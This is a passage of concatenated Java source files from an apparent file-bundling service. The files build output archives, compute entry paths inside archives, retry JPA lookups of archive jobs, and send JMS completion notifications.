uri; } /** * Generate the staging directory from the JVM properties information. * @return A staging directory on the local server. */ private String genStagingAreaFromJVM () { StringBuilder sb = new StringBuilder(); sb.append("file://"); sb.append(System.getProperty("java.io.tmpdir")); if (!sb.toString().endsWith(pathSeparator)) { sb.append(pathSeparator); } return sb.toString(); } /** * Setter method for the archive type. * @param type The output archive type. */ private void setArchiveType(ArchiveType type) { if (type == null) { type = ArchiveType.ZIP; } else { this.type = type; } } /** * Setter method for the template name used for output archive files. * @param value The user-supplied template filename. */ private void setTemplateName(String value) { if ((value == null) || (value.isEmpty())) { filenameTemplate = getFileName(); } else { // Take whatever the user requested and strip off the extension. if (value.contains(".")) { filenameTemplate = value.substring(0, value.lastIndexOf('.')); } else { filenameTemplate = value; } } } /** * Setter method for the job ID field. Modified to allow for a "empty" * value for the job ID. If the job ID is empty the output files will * be written directly to the staging area. * @param value The job ID. */ private void setJobID(String value) { if (value == null) { jobID = JobIDGenerator.generateUniqueToken(2*UNIQUE_TOKEN_LENGTH); } else { jobID = value; } } /** * Public method used to set the target staging area. This was modified * to allow public access in the event offline tools want to specify an * output location other than default staging area. * * @param value The value of the staging area retrieved from the * properties file. */ public void setStagingArea(String value) { StringBuilder sb = new StringBuilder(); if ((value == null) || (value.isEmpty())) { sb.append(genStagingAreaFromJVM()); } else { sb.append(value); if (!sb.toString().endsWith(pathSeparator)) { sb.append(pathSeparator); } } stagingArea = sb.toString(); } /** * Print out the parameters that will be utilized in constructing * the output file names. */ public String toString() { StringBuilder sb = new StringBuilder(); sb.append("FileNameGenerator Parameters : "); sb.append("Archive Type => [ "); sb.append(type.getText()); sb.append(" ], Job ID => [ "); sb.append(jobID); sb.append(" ], filename template => [ "); sb.append(filenameTemplate); sb.append(" ], staging area => [ "); sb.append(stagingArea); sb.append(" ]."); return sb.toString(); } public static void main (String[] args) { FileNameGenerator generator = new FileNameGenerator(ArchiveType.BZIP2); System.out.println(generator.getOutputDirectory()); System.out.println(generator.getOutputFile(0)); System.out.println(generator.getOutputFile(1)); System.out.println(generator.getOutputFile(2)); generator = new FileNameGenerator(ArchiveType.ZIP, "", "test_output_archive"); generator.setStagingArea("/mnt/public/data_bundles/test"); System.out.println(generator.getOutputDirectory()); System.out.println(generator.getOutputFile(0)); System.out.println(generator.getOutputFile(1)); System.out.println(generator.getOutputFile(2)); generator = new FileNameGenerator(ArchiveType.TAR, "ABCDEFGHIJKLMNOPQRSTUV"); System.out.println(generator.getOutputDirectory()); System.out.println(generator.getOutputFile(0)); System.out.println(generator.getOutputFile(1)); System.out.println(generator.getOutputFile(2)); generator = new FileNameGenerator(ArchiveType.ZIP, "ABCDEFGHIJKLMNOPQRSTUV", "test_output_archive"); System.out.println(generator.getOutputDirectory()); System.out.println(generator.getOutputFile(0)); System.out.println(generator.getOutputFile(1)); System.out.println(generator.getOutputFile(2)); } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/model/Archive.java package mil.nga.bundler.model; import java.io.Serializable; import java.net.URI; import java.util.ArrayList; import java.util.List; import mil.nga.bundler.types.ArchiveType; /** * Simple POJO class holding data that would be required to create a single * output Archive file. This is the simple version of the POJO. * * @author <NAME> * */ public class Archive implements Serializable { /** * Eclipse-generated serialVersionUID */ private static final long serialVersionUID = -1399261864675805467L; /** * The list of files that will be included in the output archive file. */ private final List<ArchiveElement> elementList; /** * The archive ID. */ private final int id; /** * The name of the output archive file. */ private final URI outputFile; /** * The type of output archive to generate. */ private final ArchiveType type; /** * Constructor enforcing the Builder design pattern. * * @param builder Builder class implementing type checking. */ public Archive(ArchiveBuilder builder) { elementList = builder.elementList; id = builder.id; outputFile = builder.outputFile; type = builder.type; } /** * Getter method for the list of files that will be included in the output * archive file. * * @return The list of files to include in the output archive. */ public List<ArchiveElement> getElementList() { return elementList; } /** * Getter method for the archive ID. * @return The archive ID */ public long getID() { return id; } /** * Getter method for the full path to the target output file. * * @return The target output archive file. */ public URI getOutputFile() { return outputFile; } /** * Getter method for the type of archive to create. * * @return The type of archive to create. */ public ArchiveType getType() { return type; } public String toString() { StringBuilder sb = new StringBuilder(); sb.append("Archive: ID => [ "); sb.append(getID()); sb.append(" ], type => [ "); sb.append(getType().getText()); sb.append(" ], output file => [ "); sb.append(getOutputFile().toString()); sb.append(" ]."); return sb.toString(); } /** * Class implementing the Builder creation pattern for new * ArchiveElement objects. * * @author <NAME> */ public static class ArchiveBuilder { private List<ArchiveElement> elementList = new ArrayList<ArchiveElement>(); private int id = 0; private URI outputFile; private long size = 0; private ArchiveType type; /** * Method used to actually construct the BundlerJobMetrics object. * @return A constructed and validated BundlerJobMetrics object. */ public Archive build() throws IllegalStateException { Archive object = new Archive(this); validateArchiveObject(object); return object; } /** * Getter method for the estimated size of the output archive. * @return The estimated size of the output archive. */ public long getSize() { return size; } /** * Add an <code>ArchiveElement</code> to the internal list of elements. * * @param value * @return Reference to the parent builder object. */ public ArchiveBuilder element(ArchiveElement value, long size) { if (value != null) { elementList.add(value); } this.size += size; return this; } /** * Add an entire list to the POJO. * * @param value The list to add to the builder. * @return Reference to the parent builder object. */ public ArchiveBuilder elementList(List<ArchiveElement> value) { if ((value != null) && (!value.isEmpty())) { elementList = value; } return this; } /** * The ID associated with the archive. * * @param value The ID associated with the archive. * @return Reference to the parent builder object. */ public ArchiveBuilder id(int value) { id = value; return this; } /** * The output file to create. * * @param value The output file to create. * @return Reference to the parent builder object. */ public ArchiveBuilder outputFileName(URI value) { outputFile = value; return this; } /** * Add an <code>ArchiveElement</code> to the internal list of elements. * * @param value * @return Reference to the parent builder object. */ public ArchiveBuilder type(ArchiveType value) { type = value; return this; } /** * Validate that all required fields are populated. * * @param object The ArchiveElement object to validate. * @throws IllegalStateException Thrown if any of the required fields * are not populated. */ public void validateArchiveObject(Archive object) throws IllegalStateException { if (object.getID() < 0) { throw new IllegalStateException ("Invalid archive ID [ " + object.getID() + " ]."); } if ((object.getElementList() == null) || (object.getElementList().isEmpty())) { throw new IllegalStateException ("List of elements to archive " + "is null or empty."); } if (object.getOutputFile() == null) { throw new IllegalStateException ("Invalid value for output " + "file URI [ null ]."); } if (object.getType() == null) { throw new IllegalStateException ("Invalid value for output " + "archive type [ null ]."); } } } } <file_sep>/parent/BundlerEJB/src/main/java/mil/nga/bundler/ejb/BundlerService.java package mil.nga.bundler.ejb; import java.io.IOException; import java.net.URI; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.util.ArrayList; import java.util.List; import javax.ejb.Asynchronous; import javax.ejb.EJB; import javax.ejb.LocalBean; import javax.ejb.Stateless; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import mil.nga.bundler.archive.ArchiveFactory; import mil.nga.bundler.exceptions.ArchiveException; import mil.nga.bundler.exceptions.ServiceUnavailableException; import mil.nga.bundler.exceptions.UnknownArchiveTypeException; import mil.nga.bundler.interfaces.BundlerConstantsI; import mil.nga.bundler.interfaces.BundlerI; import mil.nga.bundler.messages.ArchiveMessage; import mil.nga.bundler.model.ArchiveElement; import mil.nga.bundler.model.ArchiveJob; import mil.nga.bundler.model.FileEntry; import mil.nga.bundler.types.JobStateType; import mil.nga.util.FileUtils; import mil.nga.util.URIUtils; /** * Session Bean implementation class BundlerService */ @Stateless @LocalBean public class BundlerService extends NotificationService implements BundlerConstantsI { /** * Set up the Log4j system for use throughout the class */ static final Logger LOGGER = LoggerFactory.getLogger(BundlerService.class); /** * Maximum number of times to attempt to read the archive data from the * backing data source. */ private static final int MAX_ATTEMPTS = 5; /** * The amount of times to wait between database read attempts. */ private static final long WAIT_TIME = 5000; /** * Container-injected reference to the JobService EJB. */ @EJB ArchiveJobService archiveJobService; /** * Container-injected reference to the HashGenerator service. */ @EJB HashGeneratorService hashGeneratorService; /** * Container-injected reference to the FileCompletionListener service. */ @EJB FileCompletionListener fileCompletionlistener; /** * Default constructor. */ public BundlerService() { } /** * Method introduced to attempt to work around some latency issues with * JPA flushing data to the backing data store for use by other nodes in * the cluster. * * @param jobID The job ID to process. * @param archiveID The ID of the archive to process. * * @return The <code>ArchiveJob</code> to process. May be null if the * data is not available. */ private ArchiveJob getArchiveJob(String jobID, long archiveID) throws ServiceUnavailableException { int counter = 0; ArchiveJob archive = getArchiveJobService() .getArchiveJob(jobID, archiveID); // We have run into situations where the JPA subsystem has not // flushed all of the data out to the backing data store at this // point in processing. Additional logic has been inserted // here to perform multiple attempts before failing the job. if (archive == null) { while ((counter < MAX_ATTEMPTS) && (archive == null)) { LOGGER.info("Unable to find archive to process for " + "job ID [ " + jobID + " ] and archive ID [ " + archiveID + " ]. Attempt number [ " + (counter + 1) + " ] out of a maximum of [ " + MAX_ATTEMPTS + " ] attempts."); try { Thread.sleep(WAIT_TIME); } catch (InterruptedException ie) { LOGGER.debug("Unexpected InterruptedException raised " + "while pausing execution. Exception " + "=> [ " + ie.getMessage() + " ]."); } archive = getArchiveJobService() .getArchiveJob(jobID, archiveID); counter++; } } return archive; } /** * Method driving the creation of the output archive file. * * @param job The managed JPA job object. * @param archive Archive job to run. */ private void createArchive(String jobID, long archiveID) throws ArchiveException, IOException { long startTime = System.currentTimeMillis(); try { ArchiveJob archive = getArchiveJob(jobID, archiveID); if (archive != null) { // Get the concrete instance of the archiver that will be // used to construct the output archive file. ArchiveFactory factory = ArchiveFactory.getInstance(); // Get the concrete Bundler object. BundlerI bundler = factory.getBundler(archive.getArchiveType()); // Set up the listener for the completion of individual file // archives. This was added at the request of the MPSU team and // may need to be removed if too much of an impact to // performance. FileCompletionListener listener = getFileCompletionListener(); if (listener != null) { listener.setJobID(jobID); listener.setArchiveID(archiveID); bundler.addFileCompletionListener(listener); } // Here's where the magic happens. bundler.bundle( getArchiveElements(archive.getFiles()), URIUtils.getInstance().getURI(archive.getArchive())); // Generate the hash file associated with the output archive. if (getHashGeneratorService() != null) { getHashGeneratorService().generate( archive.getArchive(), archive.getHash()); } else { LOGGER.warn("Unable to obtain a reference to the " + "HashGenerator EJB. Unable to create the output " + "hash file associated with job ID [ " + archive.getJobID() + " ] and archive ID [ " + archiveID + " ]. Since few, if any, customers actually use " + "the hash for anything we just issue a warning " + "and proceed with processing."); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Archive processing for job ID [ " + jobID + " ] and archive ID [ " + archiveID + " ]. Completed in [ " + (System.currentTimeMillis() - startTime) + " ] ms."); } } else { LOGGER.error("Unable to find archive to process for " + "job ID [ " + jobID + " ] and archive ID [ " + archiveID + " ]. The maximum number of tries [ " + MAX_ATTEMPTS + " ] were exceeded."); } } catch (ServiceUnavailableException sue) { LOGGER.error("Internal system failure. Target EJB service " + "is unavailable. Exception message => [ " + sue.getMessage() + " ]."); } catch (UnknownArchiveTypeException uate) { // We should never see this exception here. However, we will log // it as there must a programming error. LOGGER.error("Unexpected UnknownArchiveException raised while " + "actually creating the output archive. This sitation " + "should have been caught much earlier than here. " + "Exception message => [ " + uate.getMessage() + " ]."); } } /** * Map the input list of <code>FileEntry</code> objects to an output list of * <code>ArchiveElement</code> objects to pass into the bundler algorithm. * * @param files A list of <code>FileEntry</code> objects to bundle. * @return a list containing <code>ArchiveElement</code> objects. The * output may be empty, but it will not be null. */ public List<ArchiveElement> getArchiveElements(List<FileEntry> files) { List<ArchiveElement> elements = new ArrayList<ArchiveElement>(); if ((files != null) && (files.size() > 0)) { for (FileEntry file : files) { elements.add(new ArchiveElement.ArchiveElementBuilder() .size(file.getSize()) .entryPath(file.getEntryPath()) .uri(URIUtils.getInstance() .getURI(file.getFilePath())) .build()); } } else { LOGGER.warn("Input list of FileEntry objects is null or empty. " + "Output list will also be empty."); } return elements; } /** * Private method used to obtain a reference to the target EJB. * * Method implemented because JBoss EAP 6.x was inexplicably NOT always * injecting the EJB (i.e. EJB reference was null) * * @return Reference to the FileCompletionListener EJB. */ private FileCompletionListener getFileCompletionListener() { if (fileCompletionlistener == null) { LOGGER.warn("Application container failed to inject the " + "reference to FileCompletionListener. Attempting to " + "look it up via JNDI."); fileCompletionlistener = EJBClientUtilities .getInstance() .getFileCompletionListener(); } return fileCompletionlistener; } /** * Private method used to obtain a reference to the target EJB. * * Method implemented because JBoss EAP 6.x was inexplicably NOT always * injecting the EJB (i.e. EJB reference was null) * * @return Reference to the HashGeneratorService EJB. * @throws ServiceUnavailableException Thrown if we are unable to obtain * a reference to the target EJB. */ private HashGeneratorService getHashGeneratorService() throws ServiceUnavailableException { if (hashGeneratorService == null) { LOGGER.warn("Application container failed to inject the " + "reference to HashGeneratorService. Attempting to " + "look it up via JNDI."); hashGeneratorService = EJBClientUtilities .getInstance() .getHashGeneratorService(); if (hashGeneratorService == null) { throw new ServiceUnavailableException("Unable to obtain a " + "reference to [ " + HashGeneratorService.class.getCanonicalName() + " ]."); } } return hashGeneratorService; } /** * Private method used to obtain a reference to the target EJB. * * Method implemented because JBoss EAP 6.x was inexplicably NOT always * injecting the EJB (i.e. EJB reference was null) * * @return Reference to the JobService EJB. * @throws ServiceUnavailableException Thrown if we are unable to obtain * a reference to the target EJB. */ private ArchiveJobService getArchiveJobService() throws ServiceUnavailableException { if (archiveJobService == null) { LOGGER.warn("Application container failed to inject the " + "reference to ArchiveJobService. Attempting to " + "look it up via JNDI."); archiveJobService = EJBClientUtilities .getInstance() .getArchiveJobService(); if (archiveJobService == null) { throw new ServiceUnavailableException("Unable to obtain a " + "reference to [ " + JobFactoryService.class.getCanonicalName() + " ]."); } } return archiveJobService; } /** * * Note: This method was added to handle very large bundle requests. * We found that if the bundle process took longer than 5 minutes the * JMS system would re-issue the message. * * @param message Message indicating which Job ID/Archive ID to process. */ @Asynchronous public void handleMessage(ArchiveMessage message) { JobStateType endState; int counter = 0; try { ArchiveJob archiveJob = getArchiveJob( message.getJobId(), message.getArchiveId()); if (archiveJob != null) { // Update the archive to reflect that archive processing // has started. archiveJob.setHostName(FileUtils.getHostName()); archiveJob.setServerName( EJBClientUtilities.getInstance().getServerName()); archiveJob.setStartTime(System.currentTimeMillis()); archiveJob.setArchiveState(JobStateType.IN_PROGRESS); getArchiveJobService().update(archiveJob); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Creating output archive file for " + "job ID [ " + archiveJob.getJobID() + " ] and archive ID [ " + archiveJob.getArchiveID() + " ]."); } try { createArchive(message.getJobId(), message.getArchiveId()); endState = JobStateType.COMPLETE; } catch (IOException ioe) { LOGGER.error("Unexpected IOException raised while " + "creating the output archive. Archive " + "state will be set to ERROR for job ID [ " + message.getJobId() + " ] archive ID [ " + message.getArchiveId() + " ]. Error message [ " + ioe.getMessage() + " ]."); endState = JobStateType.ERROR; } catch (ArchiveException ae) { LOGGER.error("Unexpected ArchiveException raised " + "while " + "creating the output archive. Archive " + "state will be set to ERROR for job ID [ " + message.getJobId() + " ] archive ID [ " + message.getArchiveId() + " ]. Error message [ " + ae.getMessage() + " ]."); endState = JobStateType.ERROR; } // The status of the ARCHIVE_JOB has changed due to the // implementation of the FileCompletionListener. Go get // the latest ARCHIVE_JOB from the data store. archiveJob = getArchiveJobService().getArchiveJob( message.getJobId(), message.getArchiveId()); if (archiveJob != null) { archiveJob.setArchiveState(endState); // Update the end time. archiveJob.setEndTime(System.currentTimeMillis()); // Go get the final size of the output archive. archiveJob.setSize(getArchiveFileSize( archiveJob.getArchive())); // Ensure the ArchiveJob is updated in the backing data store. getArchiveJobService().update(archiveJob); } else { LOGGER.error("Unable to retrieve the ArchiveJob object " + "for job ID [ " + message.getJobId() + " ] and archive ID [ " + message.getArchiveId() + " ] from the data store. Archive job status will " + "not be updated here. Will attempt to update " + "the status on notification."); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Archive complete. Sending " + "notification message file for " + "archive with job ID [ " + message.getJobId() + " ] and archive ID [ " + message.getArchiveId() + " ]."); } notify(message.getJobId(), message.getArchiveId()); } else { LOGGER.error("Unable to find an ARCHIVE_JOB matching " + "archive message parameters => [ " + message.toString() + " ]."); } } catch (ServiceUnavailableException sue) { LOGGER.error("Internal system failure. Target EJB service " + "is unavailable. Exception message => [ " + sue.getMessage() + " ]."); } } /** * Simple method used to retrieve the size of the created archive file. * * @param archive The completed Archive object. */ private long getArchiveFileSize(String archive) { long size = 0L; if ((archive != null) && (!archive.isEmpty())) { URI output = URIUtils.getInstance().getURI(archive); Path p = Paths.get(output); if (Files.exists(p)) { try { size = Files.size(p); } catch (IOException ioe) { LOGGER.error("Unexpected IOException while attempting " + "to obtain the size associated with file [ " + output.toString() + " ]. Exception message => [ " + ioe.getMessage() + " ]."); } } else { LOGGER.error("The expected output archive file [ " + archive + " ] does not exist."); } } else { LOGGER.error("The identified output archive file is null or " + "empty. The final output archive size will not be " + "set."); } return size; } /** * This method is used to notify the Tracker MDB that the processing * associated with a single Archive has completed. The JPA Archive * object is wrapped in an ObjectMessage and then placed on the * appropriate JMS Queue. * * @param archive The JPA Archive containing information associated with * the output files created. */ private void notify(String jobID, long archiveID) { ArchiveMessage archiveMsg = new ArchiveMessage.ArchiveMessageBuilder() .jobId(jobID) .archiveId(archiveID) .build(); if (LOGGER.isDebugEnabled()) { LOGGER.info("Placing the following message on " + "the JMS queue [ " + archiveMsg.toString() + " ]."); } super.notify(TRACKER_DEST_Q, archiveMsg); } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/EntryPathFactory.java package mil.nga.bundler; import java.io.File; import java.net.URI; import java.nio.file.Path; import java.nio.file.Paths; import java.util.ArrayList; import java.util.List; import java.util.Properties; import java.util.regex.Pattern; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import mil.nga.PropertyLoader; import mil.nga.bundler.exceptions.PropertiesNotLoadedException; import mil.nga.bundler.interfaces.BundlerConstantsI; /** * The "entry path" is the path (or location) within an output archive where * a target file is stored. The basic algorithm implemented executes the * following steps: * * 1. We strip off everything but the absolute file path. * 2. Once we have the absolute path to an output file, we strip off any pre- * defined path prefixes that were included in the properties file. * 3. Next, we ensure that the output file entry is not over 100 characters. * If it's longer than 100 characters, we start eliminating path elements * from the front. If we eliminate all the path entries and it's still * longer than 100 characters, we truncate the filename keeping the * extension (if it contains an extension). * * @author <NAME> */ public class EntryPathFactory extends PropertyLoader implements BundlerConstantsI { /** * An output entry path cannot be longer than 100 characters. */ public static final int ENTRY_PATH_LENGTH_LIMIT = 100; /** * Set up the Log4j system for use throughout the class */ static final Logger LOGGER = LoggerFactory.getLogger( EntryPathFactory.class); /** * List of path prefixes to exclude */ private List<String> prefixExclusions = null; /** * Private constructor that forces the singleton design pattern and * loads any relevant properties from an external file. */ private EntryPathFactory() { super(PROPERTY_FILE_NAME); try { loadPrefixMap(getProperties()); } catch (PropertiesNotLoadedException pnle) { LOGGER.warn("An unexpected PropertiesNotLoadedException " + "was encountered. Please ensure the application " + "is properly configured. Exception message [ " + pnle.getMessage() + " ]."); } } /** * Alternate private constructor added to support jUnit testing. This * constructor allows clients to supply a Properties object as opposed * to loading an external properties file. * * @param props Populated properties file. */ private EntryPathFactory(Properties props) { if (props != null) { loadPrefixMap(props); } else { LOGGER.warn("Input Properties object is null."); } } /** * Method used to load the List of path prefixes that are to be excluded * from the entry path that will exist in the output archive file. * * @param props Populated properties file. */ private void loadPrefixMap(Properties props) { if (props != null) { if (prefixExclusions == null) { prefixExclusions = new ArrayList<String>(); } for (int i=0; i<MAX_NUM_EXCLUSIONS; i++) { String exclusion = props.getProperty( PARTIAL_PROP_NAME + Integer.toString(i).trim()); if ((exclusion != null) && (!exclusion.isEmpty())) { prefixExclusions.add(exclusion); if (LOGGER.isDebugEnabled()) { LOGGER.debug("Found prefix exclusion [ " + exclusion + " ] in property [ " + PARTIAL_PROP_NAME + Integer.toString(i).trim() + " ]."); } } } } else { LOGGER.error("Input Properties object is null. No prefix " + "exclusions loaded."); } } /** * This method enforces the 100-character limit for the entry path. * * @param path The input candidate entry path. * @return An entry path conforming to the length limitation. */ public String enforceLengthLimit(String path) { String limitedPath = path; if ((limitedPath != null) && (!limitedPath.isEmpty())) { if (limitedPath.length() > ENTRY_PATH_LENGTH_LIMIT) { do { if (limitedPath.contains("/")) { limitedPath = limitedPath.substring(limitedPath.indexOf("/")+1); } else { limitedPath = truncateFilename(limitedPath); } } while (limitedPath.length() > ENTRY_PATH_LENGTH_LIMIT); } } return limitedPath; } /** * Extract and return the extension from the input file path. * @param path The input file path. * @return The extension (with the "." separator) */ public String getExtension(String path) { String extension = ""; if ((path == null) || (path.isEmpty())) { return extension; } int dotPos = path.lastIndexOf("."); if ( dotPos < 0 ) return extension; int dirPos = path.lastIndexOf( File.separator ); if ( dirPos < 0 && dotPos == 0 ) return extension; if ( dirPos >= 0 && dirPos > dotPos ) return extension; extension = path.substring(dotPos); return extension; } /** * Check to see if the input file path contains a file extension. * * @param path A full file path. * @return True if the file contains an extension, false otherwise. */ public static boolean hasExtension(String path) { if ((path == null) || (path.isEmpty())) { return false; } int dotPos = path.lastIndexOf("."); if ( dotPos < 0 ) return false; int dirPos = path.lastIndexOf( File.separator ); if ( dirPos < 0 && dotPos == 0 ) return false; if ( dirPos >= 0 && dirPos > dotPos ) return false; return true; } /** * String manipulation function to remove any extensions from the input * archive file designator. The archiver classes will add an extension * based on the type of archive that was requested. * * @param path The full path to the output archive file. * @return The path sans extensions. */ private String removeExtension(String path) { int dotPos = path.lastIndexOf("."); if (dotPos < 0) { return path; } int dirPos = path.lastIndexOf(File.separator); if ((dirPos < 0) && (dotPos == 0)) { return path; } if ((dirPos >= 0) && (dirPos > dotPos)) { return path; } return path.substring(0, dotPos); } /** * This method does the heavy lifting associated with stripping off any * configured prefixes and ensuring the output entry path does not start * with a file separator character. * * @param path The actual file path. * @return The calculated entry path. */ private String stripPredefinedExclusions(String path) { String entryPath = path; if ((prefixExclusions != null) && (prefixExclusions.size() > 0)) { for (String exclusion : prefixExclusions) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Testing for exclusion [ " + exclusion + " ]."); } if (entryPath.startsWith(exclusion)) { entryPath = entryPath.replaceFirst(Pattern.quote(exclusion), ""); } } } else { LOGGER.warn("There are no prefix exclusions available to apply " + "to the input File path."); } // Ensure the path does not start with a path separator character. if (entryPath.startsWith(System.getProperty("file.separator"))) { entryPath = entryPath.replaceFirst(Pattern.quote( System.getProperty("file.separator")), ""); } return entryPath; } /** * Method used to truncate an input filename down to the required 100 * character limit. * * @param path The candidate path. * @return The truncated filename. */ public String truncateFilename(String path) { String truncated = removeExtension(path); String extension = getExtension(path); truncated = truncated.substring( 0, ENTRY_PATH_LENGTH_LIMIT - extension.length()); return truncated + extension; } /** * Calculate the entry path associated with the input String-based * absolute path to a target file. * * @param path The String based absolute path. * @return The String-based entry path. */ public String getEntryPath(String path) { String entryPath = null; if ((path != null) && (!path.isEmpty())) { entryPath = stripPredefinedExclusions(path); entryPath = enforceLengthLimit(entryPath); } return entryPath; } /** * Calculate the entry path associated with the input URI. Only the * absolute path (not the scheme, host, etc.) is included in the * calculation of the entry path. * * @param uri URI of the target file. * @return The String-based entry path. */ public String getEntryPath(URI uri) { String entryPath = null; if ((uri != null) && (uri.getPath() != null) && (!uri.getPath().isEmpty())) { entryPath = getEntryPath(uri.getPath()); } else { LOGGER.warn("Invalid URI. Unable to retrieve the absolute path " + "from the target URI."); } return entryPath; } /** * Calculate the entry path associated with the input URI. Only the * absolute path (not the scheme, host, etc.) is included in the * calculation of the entry path. * * @param uri URI of the target file. * @param replacementPath The string to use to replace the full path. * @return The String-based entry path. */ public String getEntryPath(URI uri, String replacementPath) { StringBuilder entryPath = new StringBuilder(); if ((uri != null) && (uri.getPath() != null) && (!uri.getPath().isEmpty())) { Path p = Paths.get(uri); if ((replacementPath == null) || (replacementPath.isEmpty())) { entryPath.append(p.getFileName()); } else { entryPath.append(replacementPath); if (!entryPath.toString().endsWith(File.separator)) { entryPath.append(File.separator); } entryPath.append(p.getFileName()); } } else { LOGGER.warn("Invalid URI. Unable to retrieve the absolute path " + "from the target URI."); } return entryPath.toString(); } /** * This ugly method is used to calculate the entry path within the output * archive for files that were identified by searching through nested * directories. The basic algorithm is that the base directory is * excluded (i.e. eliminated) from the absolute path. The archivePath * (if supplied) is then prepended to what is left of the absolute path. * * @param baseDir The base directory which was the starting point for * the file search that resulted in the absolutePath. * @param archivePath The user-supplied archivePath. * @param absolutePath The absolute path to a single file. * @return The entry path for a single file. */ public String getEntryPath( URI uri, String baseDir, String archivePath) { String entryPath = null; if ((uri != null) && (uri.getPath() != null) && (!uri.getPath().isEmpty())) { entryPath = uri.getPath(); if ((entryPath != null) && (!entryPath.isEmpty())) { // treat the baseDir as an exclusion from the absolute path. if ((baseDir != null) && (!baseDir.isEmpty())) { // Treat the baseDir as an exclusion if (entryPath.startsWith(baseDir)) { entryPath = entryPath.replaceFirst( Pattern.quote(baseDir), ""); } } // If the archive path is supplied, append it to whatever is // left over. if ((archivePath != null) && (!archivePath.isEmpty())) { // Make sure the current entryPath doesn't start with a // file separator char. This ensures there are not // duplicate file separator characters. if (entryPath.startsWith("/")) { entryPath = entryPath.replaceFirst( Pattern.quote("/"), ""); } // Make sure the archivePath doesn't end with a file // separator char this ensures there are not duplicates. if (archivePath.endsWith("/")) { archivePath = archivePath.substring( 0, archivePath.length()-1); } entryPath = archivePath+"/"+entryPath; } } else { LOGGER.warn("Unable to extract file path from URI. URI " + "provided [ " + uri.toString() + " ]."); } } else { LOGGER.warn("Invalid URI. Unable to retrieve the absolute path " + "from the target URI."); } return getEntryPath(entryPath); } /** * Getter method for the prefix exclusions that were read from the input * Properties object. * @return A list of Strings to exclude from the calculated entry paths. */ public List<String> getPrefixExclusions() { return prefixExclusions; } /** * Getter method for the singleton instance of the EntryPathFactory. * @return Handle to the singleton instance of the EntryPathFactory. */ public static EntryPathFactory getInstance() { return EntryPathFactoryHolder.getFactorySingleton(); } /** * Getter method for the singleton instance of the EntryPathFactory. * @return Handle to the singleton instance of the EntryPathFactory. */ public static EntryPathFactory getInstance(Properties props) { return new EntryPathFactory(props); } /** * Static inner class used to construct the factory singleton. This * class exploits that fact that inner classes are not loaded until they * referenced therefore enforcing thread safety without the performance * hit imposed by the use of the "synchronized" keyword. * * @author <NAME> */ public static class EntryPathFactoryHolder { /** * Reference to the Singleton instance of the factory */ private static EntryPathFactory factory = null; /** * Accessor method for the singleton instance of the factory object. * @return The singleton instance of the factory. */ public static EntryPathFactory getFactorySingleton() { if (factory == null) { factory = new EntryPathFactory(); } return factory; } /** * Accessor method for the singleton instance of the factory object. * @param props Properties object. * @return The singleton instance of the factory. */ public static EntryPathFactory getFactorySingleton(Properties props) { if (factory == null) { factory = new EntryPathFactory(props); } return factory; } } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/services/JobService.java package mil.nga.bundler.services; import java.io.Closeable; import java.util.ArrayList; import java.util.List; import javax.persistence.EntityManager; import javax.persistence.EntityManagerFactory; import javax.persistence.NoResultException; import javax.persistence.Persistence; import javax.persistence.Query; import javax.persistence.criteria.CriteriaBuilder; import javax.persistence.criteria.CriteriaQuery; import javax.persistence.criteria.Root; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import mil.nga.bundler.interfaces.BundlerConstantsI; import mil.nga.bundler.model.Job; import mil.nga.bundler.exceptions.ServiceUnavailableException; /** * Non-EJB implementation of the JobService class. This class implements * the JPA interface for the <code>JOBS</code> table in the back-end data * store. * * @author <NAME> */ public class JobService implements BundlerConstantsI, Closeable { /** * Set up the Log4j system for use throughout the class */ private static final Logger LOGGER = LoggerFactory.getLogger( JobService.class); /** * EntityManager object used throughout the class. */ private EntityManager em; /** * Default constructor. */ public JobService() { } /** * Accessor method for the EntityManager object that will be used to * interact with the backing data store. * * @return A constructed EntityManager object. * @throws ServiceUnavailableException Thrown if we are unable to * construct the EntityManager. */ private EntityManager getEntityManager() throws ServiceUnavailableException { if (em == null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Creating un-managed EntityManager."); } EntityManagerFactory emFactory = Persistence.createEntityManagerFactory( UNMANAGED_APPLICATION_PERSISTENCE_CONTEXT); if (emFactory != null) { em = emFactory.createEntityManager(); } else { LOGGER.warn("The EntityManagerFactory object is null. Unable " + "to start the JPA subsystem."); } if (em == null) { throw new ServiceUnavailableException( "Unable to start the JPA subsystem. Unable to " + "construct the EntityManager."); } } return em; } /** * Retrieve a Job object from the target database. * * @param jobID The job ID (primary key) of the job to retrieve. * @return The target Job object. Null if the Job could not be found. */ public Job getJob(String jobID) throws ServiceUnavailableException { Job job = null; if ((jobID != null) && (!jobID.isEmpty())) { try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> root = cq.from(Job.class); // Add the "where" clause cq.where( cb.equal( root.get("jobID"), cb.parameter(String.class, "jobID"))); // Create the query Query query = getEntityManager().createQuery(cq); // Set the value for the where clause query.setParameter("jobID", jobID); // Retrieve the data job = (Job)query.getSingleResult(); } catch (NoResultException nre) { LOGGER.warn("Unable to find Job associated with job ID [ " + jobID + " ]. Returned Job will be null."); } } else { LOGGER.warn("The input job ID is null or empty. Unable to " + "retrieve an associated job."); } return job; } /** * Get a list of all jobIDs currently residing in the target data store. * * @return A list of jobIDs */ @SuppressWarnings("unchecked") public List<String> getJobIDs() throws ServiceUnavailableException { List<String> jobIDs = null; try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> e = cq.from(Job.class); cq.select(e.get("jobID")); Query query = getEntityManager().createQuery(cq); jobIDs = query.getResultList(); } catch (NoResultException nre) { LOGGER.warn("Unable to find any job IDs in the data store. " + "Returned list will be empty."); jobIDs = new ArrayList<String>(); } return jobIDs; } /** * Update the data in the back end database with the current contents * of the Job. * * @param job The Job object to update. * @return The container managed Job object. 